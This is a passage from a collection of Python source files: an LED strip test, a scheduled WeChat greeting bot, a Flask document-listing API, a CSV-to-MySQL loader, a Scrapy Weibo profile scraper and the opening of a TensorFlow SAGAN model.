False).server_port\n","sub_path":"curl_requests/tests/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"647996794","text":"import time\nimport board\nimport neopixel\n\npixel_pin = board.D18\nnum_pixels = 147\norder = neopixel.RGB\n\npixels = neopixel.NeoPixel(\n pixel_pin,\n num_pixels,\n brightness=0.5,\n auto_write=False,\n pixel_order=order\n)\n\npixels[0] = (255, 0, 0)\npixels.show()\n\ndef wheel(pos):\n if pos < 0 or pos > 255:\n r = g = b = 0\n elif pos < 85:\n r = int(pos * 3)\n g = int(255 - pos * 3)\n b = 0\n elif pos < 170:\n pos -= 85\n r = int(255 - pos * 3)\n g = 0\n b = int(pos * 3)\n else:\n pos -= 170\n r = 0\n g = int(pos * 3)\n b = int(255 - pos * 3)\n print('Pixels: ', (r, g, b))\n return (r, g, b) if order in (neopixel.RGB, neopixel.GRB) else (r, g, b, 0)\n\ndef rainbow_cycle(wait):\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = (i * 256 // num_pixels) + j\n pixels[i] = wheel(pixel_index & 255)\n print('Showing new pixel colors')\n pixels.show()\n time.sleep(wait)\n\nwhile True:\n print('Showing red')\n pixels.fill((255, 0, 0))\n pixels.show()\n time.sleep(1)\n\n print('Showing green')\n pixels.fill((0, 255, 0))\n pixels.show()\n time.sleep(1)\n \n print('Showing blue')\n pixels.fill((0, 0, 255))\n pixels.show()\n time.sleep(1)\n\n rainbow_cycle(0.001)\n","sub_path":"python/led_test.py","file_name":"led_test.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"600801072","text":"#coding=utf-8\nimport itchat\nimport datetime\nimport time\nimport random\n\ntoUserNames=[\n #\"凯月\",\n #\"凯月同桌\",\n \"狗狗\",\n \"深圳徒弟\",\n \"糖果\",\n #\"李志杰\",\n #\"骚军\",\n \"乔乔\",\n \"陈陈\",\n \"大妹\",\n \"小妹\",\n \"芯梦\"\n]\n\ntimes = [\n {'h':8,'m':2,'msg':[\n #'早',\n '早安'\n ]}\n]\n\ndef send_move(saytimemsg): \n for touser in toUserNames:\n saytimemsglength = len(saytimemsg)\n rand = random.randint(0,saytimemsglength-1)\n users = itchat.search_friends(name=touser)\n if(len(users)>0):\n itchat.send(saytimemsg[rand],toUserName=users[0]['UserName'])\n\n\nif __name__ == \"__main__\":\n itchat.auto_login(hotReload=True,enableCmdQR=2) # 首次扫描登录后后续自动登录\n\nwhile True:\n now = datetime.datetime.now()\n if(now.hour == 1 and now.minute == 0):\n for saytime in times:\n saytime['m'] = random.randint(0,15)\n for saytime in times:\n if(now.hour == saytime['h'] and now.minute == saytime['m']):\n saytimemsg = saytime['msg']\n send_move(saytimemsg)\n # 每隔60秒检测一次\n time.sleep(60)\n","sub_path":"python/pythonwx/sendwx.py","file_name":"sendwx.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"548352602","text":"from flask import Response\nfrom flask import jsonify\nfrom flask import abort\nfrom flask import request\nfrom db.connection import Connect\nfrom datetime import datetime\nfrom db.model import SSDokumanlarModel\n\nclass SSDokumanlar():\n def __init__(self, modelClass):\n self.conn = Connect()\n self.session = self.conn.session()\n self.model = modelClass\n\n def __del__(self):\n self.session.close()\n\n def getSS(self, cid):\n try:\n dict = []\n dictDetay = [] # Dokumanlar\n\n sql = \"\"\"\n select pidm birim_pidm, name birim_name\n from birimler\n where cid=%d\n \"\"\"%(cid)\n\n data = self.session.execute(sql)\n\n for row in data:\n dictDetay = self.getSSDetay(row.birim_pidm, cid)\n dict.append({'birim_pidm':row.birim_pidm ,'birim_name':row.birim_name, 'dokumanlar':dictDetay})\n\n _json = jsonify(dict)\n\n if (len(dict) == 0):\n return Response([])\n else:\n return _json\n\n except Exception as e:\n return Response(\"DB SQL Exception! \",e)\n\n\n def getSSDetay(self, birim_pidm, cid): #Dokumanlar\n try:\n dict = []\n\n sql = \"\"\"\n select pidm,\n dokuman_name,\n yayin_name\n from view_ssdokumanlar\n where birim_pidm=%d and cid=%d\n \"\"\"%(birim_pidm, cid)\n\n data = self.session.execute(sql)\n\n for row in data:\n # dict.append({'pidm':row.pidm, 'birim':row.birim, 'kurum':row.kurum,'timestamp':row.timestamp})\n dict.append({'pidm':row.pidm,'dokuman_name':row.dokuman_name, 'yayin_name':row.yayin_name})\n\n return dict\n\n except Exception as e:\n return Response(\"DB SQL Exception! \",e)\n\n def add(self):\n try:\n self.session.add(self.model)\n self.session.commit()\n print(\"Add Successfully\")\n return '', 204\n except Exception as e:\n return Response(\"SSDokumanlar DB Add Exception! \",e)\n\n def delete(self):\n try:\n _pidm = int(self.model.pidm)\n _cid = int(self.model.cid)\n row = self.session.query(\n self.model.__class__).filter_by(pidm=_pidm, cid=_cid).one()\n self.session.delete(row)\n self.session.commit()\n return '', 204\n except Exception as err:\n print(\"DB Error on deleting \", err)\n return '', 404\n\n\ndef getSSDokumanlar(cid):\n cc = SSDokumanlar(SSDokumanlarModel)\n return cc.getSS(cid)\n\ndef addSSDokuman(form):\n _birim_pidm = form.get('birim_pidm')\n _dokuman_pidm = form.get('dokuman_pidm')\n _yayin_pidm = form.get('yayin_pidm')\n _cid = form.get('cid')\n _uid = form.get('uid')\n\n cc=SSDokumanlar(SSDokumanlarModel(birim_pidm=_birim_pidm, dokuman_pidm=_dokuman_pidm, yayin_pidm=_yayin_pidm, cid=_cid, uid=_uid))\n\n return cc.add()\n\ndef delSSDokuman(form):\n _pidm = form.get('pidm')\n _cid = form.get('cid')\n\n cc=SSDokumanlar(SSDokumanlarModel(pidm=_pidm, cid=_cid))\n\n return cc.delete()","sub_path":".vscode/api/ss/ssdokumanlar.py","file_name":"ssdokumanlar.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"324126895","text":"# -*- coding: utf-8 -*-\n\nfrom random import random\n\nimport json\n\nimport random\nimport re\nimport sys\nimport traceback\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom time import sleep\nimport requests\nimport scrapy\nfrom lxml import etree\nfrom tqdm import tqdm\nfrom crawler.items import WeiboUserItem\n\n\nclass Weibo(scrapy.Spider):\n name = 'weibo'\n allowed_domains = ['weibo.cn']\n start_urls = ['https://weibo.cn/u/5829543885']\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.filter = 1\n self.got_num = 0 # 爬取到的微博数\n self.weibo = []\n itemDict = {}\n try:\n with open('cookie.json') as f:\n self.cookie_json = json.loads(f.read())\n except:\n self.cookie = {}\n\n items = self.cookie_json['Cookie'].split(';')\n for item in items:\n key = item.split('=')[0].replace(' ', '')\n value = item.split('=')[1]\n itemDict[key] = value\n self.cookie = itemDict\n self.cookie_str = itemDict\n print(self.cookie)\n\n def start_requests(self):\n start_url = 'https://weibo.cn/u/5829543885'\n cookie = self.cookie\n headers = {\n 'Connection': 'keep - alive',\n 'User-Agent': self.cookie_json[\"user-agent\"]\n }\n yield scrapy.Request(url=start_url, headers=headers, cookies=cookie)\n\n def parse(self, response):\n item = WeiboUserItem()\n self.user_id = int(response.url.split('/')[-1])\n item['user_id'] = self.user_id # 用户id,即需要我们输入的数字,如昵称为“Dear-迪丽热巴”的id为1669879400\n item['nickname'] = response.xpath(\"//title/text()\").extract_first()[0:-3] # 用户昵称,如“Dear-迪丽热巴”\n\n user_info = response.xpath(\"//div[@class='tip2']/*/text()\").extract()\n\n item['weibo_num'] = int(user_info[0][3:-1]) # 用户全部微博数\n item['following'] = int(user_info[1][3:-1]) # 用户关注数\n item['followers'] = int(user_info[2][3:-1]) # 用户粉丝数\n\n page_num = self.get_page_num(response) # 获取微博总页数\n print(page_num)\n page1 = 0\n random_pages = random.randint(1, 5)\n for page in tqdm(range(1, page_num + 1), desc=u\"进度\"):\n self.get_one_page(page) # 获取第page页的全部微博\n\n # 通过加入随机等待避免被限制。爬虫速度过快容易被系统限制(一段时间后限\n # 制会自动解除),加入随机等待模拟人的操作,可降低被系统限制的风险。默\n # 认是每爬取1到5页随机等待6到10秒,如果仍然被限,可适当增加sleep时间\n if page - page1 == random_pages:\n sleep(random.randint(6, 10))\n page1 = page\n random_pages = random.randint(1, 5)\n\n if not self.filter:\n print(u\"共爬取\" + str(self.got_num) + u\"条微博\")\n else:\n print(u\"共爬取\" + str(self.got_num) + u\"条原创微博\")\n\n item['got_num'] = self.got_num # 爬取到的微博数\n item['weibo'] = self.weibo\n\n yield item\n\n def get_page_num(self, response):\n \"\"\"获取微博总页数\"\"\"\n try:\n if response.xpath(\"//input[@name='mp']\") == []:\n page_num = 1\n else:\n page_num = (int)(\n response.xpath(\"//input[@name='mp']\")[0].attrib[\"value\"])\n return page_num\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_one_page(self, page):\n \"\"\"获取第page页的全部微博\"\"\"\n try:\n url = \"https://weibo.cn/u/%d?page=%d\" % (self.user_id, page)\n selector = self.deal_html(url)\n info = selector.xpath(\"//div[@class='c']\")\n is_empty = info[0].xpath(\"div/span[@class='ctt']\")\n if is_empty:\n for i in range(0, len(info) - 2):\n is_retweet = info[i].xpath(\"div/span[@class='cmt']\")\n if (not self.filter) or (not is_retweet):\n self.weibo.append({})\n self.get_weibo_content(info[i]) # 微博内容\n self.get_weibo_place(info[i]) # 微博位置\n self.get_publish_time(info[i]) # 微博发布时间\n self.get_publish_tool(info[i]) # 微博发布工具\n self.get_weibo_footer(info[i]) # 微博点赞数、转发数、评论数\n self.got_num += 1\n print(\"-\" * 100)\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def deal_html(self, url):\n \"\"\"处理html\"\"\"\n try:\n html = requests.get(url, cookies=self.cookie).content\n selector = etree.HTML(html)\n return selector\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def deal_garbled(self, info):\n \"\"\"处理乱码\"\"\"\n try:\n info = info.xpath(\n \"string(.)\").replace(u\"\\u200b\", \"\").encode(sys.stdout.encoding, \"ignore\").decode(\n sys.stdout.encoding)\n return info\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_long_weibo(self, weibo_link):\n \"\"\"获取长原创微博\"\"\"\n try:\n selector = self.deal_html(weibo_link)\n info = selector.xpath(\"//div[@class='c']\")[1]\n wb_content = self.deal_garbled(info)\n wb_time = info.xpath(\"//span[@class='ct']/text()\")[0]\n wb_content = wb_content[wb_content.find(\n \":\") + 1:wb_content.rfind(wb_time)]\n return wb_content\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_original_weibo(self, info):\n \"\"\"获取原创微博\"\"\"\n try:\n weibo_content = self.deal_garbled(info)\n weibo_content = weibo_content[:weibo_content.rfind(u\"赞\")]\n a_text = info.xpath(\"div//a/text()\")\n if u\"全文\" in a_text:\n weibo_id = info.xpath(\"@id\")[0][2:]\n weibo_link = \"https://weibo.cn/comment/\" + weibo_id\n wb_content = self.get_long_weibo(weibo_link)\n if wb_content:\n weibo_content = wb_content\n return weibo_content\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_long_retweet(self, weibo_link):\n \"\"\"获取长转发微博\"\"\"\n try:\n wb_content = self.get_long_weibo(weibo_link)\n wb_content = wb_content[:wb_content.rfind(u\"原文转发\")]\n return wb_content\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_retweet(self, info):\n \"\"\"获取转发微博\"\"\"\n try:\n original_user = info.xpath(\"div/span[@class='cmt']/a/text()\")\n if not original_user:\n wb_content = u\"转发微博已���删除\"\n return wb_content\n else:\n original_user = original_user[0]\n wb_content = self.deal_garbled(info)\n wb_content = wb_content[wb_content.find(\n \":\") + 1:wb_content.rfind(u\"赞\")]\n wb_content = wb_content[:wb_content.rfind(u\"赞\")]\n a_text = info.xpath(\"div//a/text()\")\n if u\"全文\" in a_text:\n weibo_id = info.xpath(\"@id\")[0][2:]\n weibo_link = \"https://weibo.cn/comment/\" + weibo_id\n wb_content = self.get_long_retweet(weibo_link)\n if wb_content:\n weibo_content = wb_content\n retweet_reason = self.deal_garbled(info.xpath(\"div\")[-1])\n retweet_reason = retweet_reason[:retweet_reason.rindex(u\"赞\")]\n wb_content = (retweet_reason + \"\\n\" + u\"原始用户: \" +\n original_user + \"\\n\" + u\"转发内容: \" + wb_content)\n return wb_content\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_weibo_content(self, info):\n \"\"\"获取微博内容\"\"\"\n try:\n is_retweet = info.xpath(\"div/span[@class='cmt']\")\n if is_retweet:\n weibo_content = self.get_retweet(info)\n else:\n weibo_content = self.get_original_weibo(info)\n self.weibo[-1]['weibo_content'] = weibo_content\n print(weibo_content)\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_weibo_place(self, info):\n \"\"\"获取微博发布位置\"\"\"\n try:\n div_first = info.xpath(\"div\")[0]\n a_list = div_first.xpath(\"a\")\n weibo_place = u\"无\"\n for a in a_list:\n if (\"place.weibo.com\" in a.xpath(\"@href\")[0] and\n a.xpath(\"text()\")[0] == u\"显示地图\"):\n weibo_a = div_first.xpath(\"span[@class='ctt']/a\")\n if len(weibo_a) >= 1:\n weibo_place = weibo_a[-1]\n if u\"视频\" == div_first.xpath(\"span[@class='ctt']/a/text()\")[-1][-2:]:\n if len(weibo_a) >= 2:\n weibo_place = weibo_a[-2]\n else:\n weibo_place = u\"无\"\n weibo_place = self.deal_garbled(weibo_place)\n break\n self.weibo[-1]['weibo_place'] = weibo_place\n print(u\"微博位置: \" + weibo_place)\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_publish_time(self, info):\n \"\"\"获取微博发布时间\"\"\"\n try:\n str_time = info.xpath(\"div/span[@class='ct']\")\n str_time = self.deal_garbled(str_time[0])\n publish_time = str_time.split(u'来自')[0]\n if u\"刚刚\" in publish_time:\n publish_time = datetime.now().strftime(\n '%Y-%m-%d %H:%M')\n elif u\"分钟\" in publish_time:\n minute = publish_time[:publish_time.find(u\"分钟\")]\n minute = timedelta(minutes=int(minute))\n publish_time = (datetime.now() - minute).strftime(\n \"%Y-%m-%d %H:%M\")\n elif u\"今天\" in publish_time:\n today = datetime.now().strftime(\"%Y-%m-%d\")\n time = publish_time[3:]\n publish_time = today + \" \" + time\n elif u\"月\" in publish_time:\n year = datetime.now().strftime(\"%Y\")\n month = publish_time[0:2]\n day = publish_time[3:5]\n time = publish_time[7:12]\n publish_time = (year + \"-\" + month + \"-\" + day + \" \" + time)\n else:\n publish_time = publish_time[:16]\n self.weibo[-1]['publish_time'] = publish_time\n print(u\"微博发布时间: \" + publish_time)\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_publish_tool(self, info):\n \"\"\"获取微博发布工具\"\"\"\n try:\n str_time = info.xpath(\"div/span[@class='ct']\")\n str_time = self.deal_garbled(str_time[0])\n if len(str_time.split(u'来自')) > 1:\n publish_tool = str_time.split(u'来自')[1]\n else:\n publish_tool = u\"无\"\n self.weibo[-1]['publish_tool'] = publish_tool\n print(u\"微博发布工具: \" + publish_tool)\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_weibo_footer(self, info):\n \"\"\"获取微博点赞数、转发数、评论数\"\"\"\n try:\n pattern = r\"\\d+\"\n str_footer = info.xpath(\"div\")[-1]\n str_footer = self.deal_garbled(str_footer)\n str_footer = str_footer[str_footer.rfind(u'赞'):]\n weibo_footer = re.findall(pattern, str_footer, re.M)\n\n up_num = int(weibo_footer[0])\n self.weibo[-1]['up_num'] = up_num\n print(u\"点赞数: \" + str(up_num))\n\n retweet_num = int(weibo_footer[1])\n self.weibo[-1]['retweet_num'] = retweet_num\n print(u\"转发数: \" + str(retweet_num))\n\n comment_num = int(weibo_footer[2])\n self.weibo[-1]['comment_num'] = comment_num\n print(u\"评论数: \" + str(comment_num))\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n","sub_path":"crawler/spiders/weibo.py","file_name":"weibo.py","file_ext":"py","file_size_in_byte":12948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"323560546","text":"import csv,mysql.connector\r\n\r\n\r\nclass CSV_TO_SQL:\r\n\r\n\tdef __init__(self,database):\r\n\t\tself.__database = database\r\n\r\n\tdef insertIntoTable(self,f,course_run,uni):\r\n\t\t\"\"\" \r\n\t\tInserts a csv file into the corresponding mysql table.\r\n\r\n\t\t:param:\r\n\t\t\tf: The file to be inserted.\r\n\t\t\tcourse_run: The run number.\r\n\t\t\tuni: The University the course belongs to.\r\n\r\n\t\t\"\"\"\r\n\t\t_file = open(f)\r\n\t\t_reader = csv.reader(_file)\r\n\t\thead = next(_reader)\r\n\t\tblank1,blank2,_filename, _extend = f.split('.')\r\n\t\tdots,data,uni,course, otherDeets, datatype = _filename.split(\"/\")\r\n\t\tcursor = self.__database.cursor()\r\n\t\tdelete = ''\r\n\t\tload = ''\r\n\t\r\n\r\n\t\tif 'comments' in datatype:\r\n\t\t\tcol = ''\r\n\t\t\tsetting = ''\r\n\r\n\t\t\t\r\n\t\t\tif(len(head) == 8):\r\n\t\t\t\tcol = \t\"(id,author_id,@parent_id,@step,@text,@timestamp,@moderated,@likes) \"\r\n\t\t\t\tsetting = \"step = @step,week_number = SUBSTRING_INDEX(@step,'.',1),step_number = SUBSTRING_INDEX(@step,'.',-1),\"\\\r\n\t\t\t\t\"text = @text,timestamp = @timestamp,Likes = @Likes, \"''\r\n\r\n\t\t\telse:\r\n\t\t\t\tcol = \"(id,author_id,@parent_id,step,week_number,step_number,text,timestamp,@moderated,likes) \"\r\n\r\n\t\t\tload = 'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Comments ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' ENCLOSED BY \"+ '\\'\"\\'' \\\r\n\t\t\t'IGNORE 1 LINES ' + col +\\\r\n\t\t\t\"Set parent_id = nullif(@parent_id,' '), \"+ setting +\"moderated = nullif(@moderated,' '),university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\"\r\n\t\t\t\r\n\r\n\t\telif 'enrolments' in datatype:\r\n\t\t\t\r\n\t\t\r\n\t\t\tload = 'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Enrolments ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' LINES TERMINATED BY '\\n' \" + \\\r\n\t\t\t'IGNORE 1 LINES ' \\\r\n\t\t\t\"(learner_id,enrolled_at,@unenrolled_at,role,@fully_participated_at,@purchased_statement_at,gender,country,age_range,highest_education_level,employment_status,employment_area) \"\\\r\n\t\t\t\"Set unenrolled_at = nullif(@unenrolled_at,' '),fully_participated_at = nullif(@fully_participated_at,' '),purchased_statement_at = nullif(@purchased_statement_at,' '),university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\" \r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\telif 'assignments' in datatype:\t\r\n\r\n\t\t\tcol = \t\"(id,step,step_number,week_number,author_id,text,first_viewed_at,submitted_at,@moderated,review_count) \"\r\n\t\t\t\r\n\r\n\t\t\tload = 'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Assignments ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' ENCLOSED BY \"+ '\\'\"\\'' \\\r\n\t\t\t'IGNORE 1 LINES ' + col + \\\r\n\t\t\t\"Set moderated = nullif(@moderated,' '),university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\" \r\n\t\t\t\r\n\r\n\t\telif 'reviews' in datatype:\r\n\r\n\t\t\tcol = '(id,step,week_number,step_number,reviewer_id,assignment_id,guideline_one_feedback,guideline_two_feedback,guideline_three_feedback,created_at)'\r\n\t\t\t\t\r\n\r\n\t\t\tload = \t'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Reviews ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' ENCLOSED BY \"+ '\\'\"\\'' \\\r\n\t\t\t'IGNORE 1 LINES ' + col + \\\r\n\t\t\t\"Set university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\"\r\n\t\t\t\r\n\r\n\t\telif 'question' in datatype:\r\n\r\n\r\n\t\t\tload = \t'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Quiz ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' ENCLOSED BY \"+ '\\'\"\\'' \\\r\n\t\t\t'IGNORE 1 LINES ' + \"(learner_id,quiz_question,week_number,step_number,question_number,response,submitted_at,@correct)\" +\\\r\n\t\t\t\"Set correct = STRCMP(@correct,'TRUE') + 1, university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\"\r\n\t\t\t\r\n\r\n\t\telif 'activity' in datatype:\r\n\r\n\t\t\tcol = ''\r\n\t\t\tsetting = ''\r\n\t\t\tif(len(head) == 4):\r\n\t\t\t\tcol = '(learner_id,@step,@first_visited_at,@last_completed_at)'\t\t\t\t\r\n\t\t\t\tsetting = \"step = @step, week_number = SUBSTRING_INDEX(@step,'.',1),step_number = SUBSTRING_INDEX(@step,'.',-1),\" \\\r\n\t\t\t\t\" first_visited_at = @first_visited_at, \"\r\n\t\t\telse:\r\n\t\t\t\tcol = '(learner_id,step,week_number,step_number,first_visited_at,@last_completed_at)'\r\n\r\n\r\n\t\t\tload = 'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Activity ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' \" \\\r\n\t\t\t\"IGNORE 1 LINES \" + col +\\\r\n\t\t\t\"Set \" + setting + \"last_completed_at = nullif(@last_completed_at,' '),university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\" \r\n\t\t\r\n\t\telif 'Courses' in datatype:\r\n\r\n\t\t\tcol = '(course_run,start_date,no_of_weeks,joiners,leavers,learners,active_Learners,returning_learners,social_learners,fully_participating_learners,statements_sold,course,run)'\r\n\t\t\tload = 'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Courses ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' \" \\\r\n\t\t\t\"IGNORE 1 LINES \" + col + \\\r\n\t\t\t\"Set university = \" + \"'\" + uni + \"';\"\r\n\r\n\t\telif 'team-members' in datatype:\r\n\t\t\tcol = '(id,first_name,last_name,team_role,user_role)'\r\n\r\n\t\t\tload = \t'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE TeamMembers ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' ENCLOSED BY \"+ '\\'\"\\'' \\\r\n\t\t\t'IGNORE 1 LINES ' + col +\";\"\r\n\r\n\t\r\n\t\t\t\r\n\t\tcursor.execute(load)\r\n\t\tself.__database.commit()\r\n\t\tcursor.close()\r\n\t\t_file.close()\r\n","sub_path":"update/csvToSQL.py","file_name":"csvToSQL.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"168691760","text":"import tensorflow as tf\r\nfrom tensorflow.contrib.data import shuffle_and_repeat, map_and_batch\r\nimport numpy as np\r\nimport cv2\r\nimport time\r\nfrom layers import *\r\nfrom utils import *\r\n\r\nclass SAGAN():\r\n model_name = \"SAGAN\" # name for ckpt\r\n\r\n def __init__(self, sess, args):\r\n self.sess = sess\r\n self.dataset = args.dataset\r\n\r\n self.epoch = args.epoch\r\n self.batch_size = args.batch_size\r\n self.image_size = args.image_size\r\n self.image_save_freq = args.image_save_freq\r\n self.model_save_freq = args.model_save_freq\r\n\r\n self.sample_num = args.sample_num\r\n self.test_num = args.test_num\r\n\r\n \"\"\" Generator \"\"\"\r\n self.layer_num = int(np.log2(self.image_size)) - 2\r\n self.z_dim = args.z_dim # dimension of noise-vector\r\n self.gan_type = args.gan_type\r\n\r\n \"\"\" Discriminator \"\"\"\r\n self.n_critic = args.n_critic\r\n self.ld = args.ld\r\n\r\n # train\r\n self.g_lr = args.g_lr\r\n self.d_lr = args.d_lr\r\n self.beta1 = args.beta1\r\n self.beta2 = args.beta2\r\n\r\n self.ckpt_dir = args.ckpt_dir\r\n self.result_dir = args.result_dir\r\n self.log_dir = args.log_dir\r\n self.sample_dir = args.sample_dir\r\n\r\n self.sample_dir = os.path.join(self.sample_dir, self.model_dir)\r\n check_folder(self.sample_dir)\r\n\r\n self.ch = 3\r\n path = './dataset/'\r\n self.data_filenames = load_datanames(self.image_size, path+str(self.dataset))\r\n self.data_num = len(self.data_filenames)\r\n\r\n print()\r\n print('----- Information -----')\r\n print('dataset : {}'.format(self.dataset))\r\n print('data_num : {}'.format(self.data_num))\r\n print('epoch : {}'.format(self.epoch))\r\n print('batch_size : {}'.format(self.batch_size))\r\n print('image_size : {}'.format(self.image_size))\r\n\r\n print()\r\n print('----- Generator -----')\r\n print('generator layer num : {}'.format(self.layer_num))\r\n print('gan type : {}'.format(self.gan_type))\r\n print('z_dim : {}'.format(self.z_dim))\r\n\r\n print()\r\n print('----- Discriminator -----')\r\n print('discriminator layer num : {}'.format(self.layer_num))\r\n print('the number of critic : {}'.format(self.n_critic))\r\n print()\r\n\r\n def generator(self, z, is_training=True, trainable=False, reuse=False):\r\n with tf.variable_scope('generator', reuse=reuse):\r\n ch = 512\r\n x = affine(z, num_out=4*4*ch, name='affine')\r\n x = tf.reshape(x, [-1, 4, 4, ch])\r\n\r\n for i in range(self.layer_num//2):\r\n x = deconv2d(x, k_size=4, out_ch=ch//2, stride=2, name='deconv2d_'+str(i))\r\n x = relu(x)\r\n x = batch_norm(x, name='batch_'+str(i), is_training=is_training, trainable=trainable)\r\n\r\n ch = ch // 2\r\n\r\n x = self.attention(x, ch, name='attention', reuse=reuse)\r\n\r\n for i in range(self.layer_num//2, self.layer_num):\r\n x = deconv2d(x, k_size=4, out_ch=ch//2, stride=2, name='deconv2d_'+str(i))\r\n x = relu(x)\r\n x = batch_norm(x, name='batch_'+str(i), is_training=is_training, trainable=trainable)\r\n\r\n ch = ch // 2\r\n\r\n x = conv2d(x, k_size=5, out_ch=self.ch, stride=1, name='G_logit')\r\n x = tanh(x)\r\n\r\n return x\r\n\r\n def discriminator(self, x, reuse=False):\r\n with tf.variable_scope('discriminator', reuse=reuse):\r\n ch = 64\r\n x = conv2d(x, k_size=4, out_ch=ch, stride=2, name='conv')\r\n x = lrelu(x, 0.1)\r\n\r\n for i in range(self.layer_num//2):\r\n x = conv2d(x, k_size=4, out_ch=ch*2, stride=2, name='conv_'+str(i))\r\n x = lrelu(x, 0.1)\r\n\r\n ch = ch * 2\r\n\r\n x = self.attention(x, ch, name='attention')\r\n\r\n for i in range(self.layer_num//2, self.layer_num):\r\n x = conv2d(x, k_size=4, out_ch=ch*2, stride=2, name='conv_'+str(i))\r\n x = lrelu(x, 0.1)\r\n\r\n ch = ch * 2\r\n\r\n x = flatten(x)\r\n x = affine(x, num_out=1, name='D_logit')\r\n\r\n return x\r\n\r\n def attention(self, x, ch, name, reuse=False):\r\n with tf.variable_scope(name) as scope:\r\n f = conv2d(x, k_size=1, out_ch=ch//8, stride=1, name='f_conv2d')\r\n g = conv2d(x, k_size=1, out_ch=ch//8, stride=1, name='g_conv2d')\r\n h = conv2d(x, k_size=1, out_ch=ch, stride=1, name='h_conv2d')\r\n\r\n s = tf.matmul(hw_flatten(g), hw_flatten(f), transpose_b=True)\r\n\r\n beta = tf.nn.softmax(s, axis=-1) # attention map\r\n\r\n o = tf.matmul(beta, hw_flatten(h))\r\n gamma = tf.get_variable(\"gamma\", [1], initializer=tf.constant_initializer(0.0))\r\n\r\n o = tf.reshape(o, shape=x.shape)\r\n x = gamma * o + x\r\n\r\n return x\r\n\r\n def gradient_penalty(self, real, fake):\r\n if self.gan_type == 'dragan' :\r\n shape = tf.shape(real)\r\n eps = tf.random_uniform(shape=shape, minval=0., maxval=1.)\r\n x_mean, x_var = tf.nn.moments(real, axes=[0, 1, 2, 3])\r\n x_std = tf.sqrt(x_var) # magnitude of noise decides the size of local region\r\n noise = 0.5 * x_std * eps # delta in paper\r\n\r\n # Author suggested U[0,1] in original paper, but he admitted it is bug in github\r\n # (https://github.com/kodalinaveen3/DRAGAN). It should be two-sided.\r\n\r\n alpha = tf.random_uniform(shape=[shape[0], 1, 1, 1], minval=-1., maxval=1.)\r\n interpolated = tf.clip_by_value(real + alpha * noise, -1., 1.) # x_hat should be in the space of X\r\n\r\n else :\r\n alpha = tf.random_uniform(shape=[self.batch_size, 1, 1, 1], minval=0., maxval=1.)\r\n interpolated = alpha*real + (1. - alpha)*fake\r\n\r\n logit = self.discriminator(interpolated, reuse=True)\r\n\r\n grad = tf.gradients(logit, interpolated)[0] # gradient of D(interpolated)\r\n grad_norm = tf.norm(flatten(grad), axis=1) # l2 norm\r\n\r\n GP = 0\r\n\r\n # WGAN - LP\r\n if self.gan_type == 